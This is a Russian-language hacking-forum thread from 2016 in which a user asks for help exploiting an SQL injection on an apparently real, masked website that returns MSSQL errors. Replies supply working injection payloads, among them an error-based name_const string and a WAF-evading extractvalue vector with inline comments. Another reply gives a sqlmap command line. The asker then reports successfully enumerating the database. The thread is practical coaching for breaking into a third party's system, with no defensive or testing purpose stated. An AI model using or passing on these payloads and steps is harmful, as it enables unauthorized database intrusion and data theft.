ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.02.2016, 08:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
1811
Репутация:
0
|
|
Помогите расскрутить sql
Вид такой:
site.com/city/1'
Все перелазил ничего не нашел!
Код ошибки
1)Throwable_SQL_Exception [ 0 ]: Message: Failed to query SQL statement. Reason: Incorrect syntax near 'id' and Draft = 0'.
Код:
Code:
MODPATH/leap/classes/Base/DB/MsSQL/DataReader/Standard.php [ 48 ]
43 */
44 public function __construct(DB_Connection_Driver $connection, $sql, $mode = NULL) {
45 $resource = $connection->get_resource();
46 $command = @mssql_query($sql, $resource);
47 if ($command === FALSE) {
48 throw new Throwable_SQL_Exception('Message: Failed to query SQL statement. Reason: :reason', array(':reason' => @mssql_get_last_message()));
49 }
50 $this->command = $command;
51 $this->record = FALSE;
52 }
|
|
|
|
10.02.2016, 10:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Error dased
|
|
|
|
10.02.2016, 10:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
1811
Репутация:
0
|
|
Сообщение от OxoTnik
OxoTnik said:
↑
Error dased это как понять?
site.com/city/1' - не могу понять как сделать правельную sql типо .php?city=1'
|
|
|
|
10.02.2016, 11:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
site.com/city/1'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1
|
|
|
|
10.02.2016, 13:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
1811
Репутация:
0
|
|
Сообщение от OxoTnik
OxoTnik said:
↑
site.com/city/1
'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1 Перекидывает на 404
А можно в sqlmap какнибудь раскрутить?
|
|
|
|
10.02.2016, 14:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Есть ещё один прекрасный вектор, который может сработать в твоей ситуации.
Код:
Code:
site.com/city/-1+/*!aNd*/+/*!ExTRaCtVaLuE*/(1,/*!CoNcAt*/(0x3a,(version()))+--+
Местный WAF всему виной. |
|
|
|
10.02.2016, 14:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
1811
Репутация:
0
|
|
Сообщение от OxoTnik
OxoTnik said:
↑
site.com/city/1
'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1 Перекидывает на 404
А можно в sqlmap какнибудь раскрутить?
Сообщение от MaxFast
MaxFast said:
↑
Есть ещё один прекрасный вектор, который может сработать в твоей ситуации.
Код:
Code:
site.com/city/-1+/*!aNd*/+/*!ExTRaCtVaLuE*/(1,/*!CoNcAt*/(0x3a,(version()))+--+
Местный WAF всему виной. (((всерано перекидывает на 404
|
|
|
|
10.02.2016, 16:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
11851
Репутация:
30
|
|
Сообщение от magichead
magichead said:
↑
А можно в sqlmap какнибудь раскрутить? sqlmap.py -u " site.com/city/1*" --level=5 --random-agent
|
|
|
|
10.02.2016, 21:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
1811
Репутация:
0
|
|
Сообщение от Shubka75
Shubka75 said:
↑
sqlmap.py -u "
site.com/city/1*
" --level=5 --random-agent Спасибо!Расскрутил,но вот проблема с кодировкой!Пишет что база MSQL 2012,пишет что база найдена.Но в место имени выходит квадрат с четырьмя нулями.Как быть с этим?
|
|
|
|
13.02.2016, 23:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
137056
Репутация:
11
|
|
Сообщение от magichead
magichead said:
↑
Спасибо!Расскрутил,но вот проблема с кодировкой!Пишет что база MSQL 2012,пишет что база найдена.Но в место имени выходит квадрат с четырьмя нулями.Как быть с этим? Можно посмотреть в лог-файле sqlmap, возможно консоль не поддерживает данную кодировку (какая бы она ни была), но это только предположение.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
